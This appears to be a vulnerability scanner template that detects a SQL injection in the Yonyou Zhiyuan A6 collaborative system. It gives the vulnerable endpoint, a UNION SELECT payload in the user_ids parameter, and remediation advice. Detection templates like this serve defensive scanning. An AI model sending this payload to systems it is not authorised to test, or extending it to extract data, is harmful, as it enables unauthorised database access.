id: wooyun-2010-0110312
info:
  name: Yonyou Zhiyuan A6 Collaborative System SQL Injection
  author:
  - 折跃
  description: |-
    Yonyou Zhiyuan A6 isNotInTable.jsp SQL Injection Vulnerability
    Yonyou Zhiyuan A6 Collaborative Management System is an efficient web-based collaborative work platform and an excellent collaborative management system.

    A SQL injection vulnerability exists in Yonyou Zhiyuan A6. An attacker can exploit it to execute SQL statements to view, add, modify, or delete information in the database.
  severity: high
  remediation: |-
    Official remediation:
    1. It is recommended that users obtain the latest patch or the latest version of the program from the vendor:
    https://www.seeyon.com/

    Temporary remediation:
    1. Use prepared statements. When using PDO, be careful not to concatenate variables directly into PDO statements. All queries should use the database's parameterized query interface, using parameters instead of embedding user-supplied variables directly into SQL statements. Almost all database systems provide parameterized SQL execution interfaces, which can effectively prevent SQL injection attacks.
    2. Escape special characters entering the database (such as ', ", <, >, &, *, ;, etc.) or perform encoding conversion.
    3. Validate the type of each data item; for example, numeric data must be numeric and the corresponding database storage field must be an int type.
    4. Strictly limit data length, which can, to some extent, prevent longer SQL injection statements from being executed successfully.
    5. Unify the encoding of every data layer of the website; it is recommended to use UTF-8 encoding throughout, as inconsistent encoding between layers may cause some filtering models to be bypassed.
    6. Strictly limit the database operational privileges granted to website users, providing only the minimum privileges needed for their work, thereby minimizing the damage injection attacks can cause to the database.
    7. Avoid displaying SQL error messages on the website, such as type errors and field mismatches, to prevent attackers from leveraging these error messages for reconnaissance.
    8. Filter dangerous characters; for example, use regular expressions to match keywords such as union, sleep, and, select, and load_file, and terminate execution if a match is found.
requests:
- matchers:
  - type: dsl
    condition: and
    dsl:
    - status_code==200
    - contains(body,verify)
    - '!contains(body,''select'')'
  path:
  - '{{BaseURL}}/yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp?user_ids=(17)%20union%20all%20select%20{{verify}}#'
  method: GET
  headers:
    Host: '{{Hostname}}'
  req-condition: true
variables:
  verify: '{{rand_text_alphanumeric(32,"")}}'
